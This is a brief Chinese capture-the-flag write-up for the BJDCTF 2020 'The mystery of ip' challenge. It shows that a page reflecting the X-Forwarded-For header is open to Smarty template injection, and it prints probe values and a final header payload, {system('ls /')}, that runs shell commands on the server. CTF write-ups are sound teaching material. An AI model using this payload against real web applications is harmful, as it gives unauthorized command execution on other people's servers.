[BJDCTF 2020]The mystery of ip
根据 Hint 页面的提示
<!-- Do you know why i know your ip? -->
猜测 Flag 页面显示的 IP 是根据 X-Forwarded-For 字段来进行判断的
尝试修改X-Forwarded-For字段的值为: ${7*7}
和 a{*comment*}b
之后能够确定是 Smarty 模板且存在模板注入,于是直接命令执行即可
X-Forwarded-For = {system('ls /')}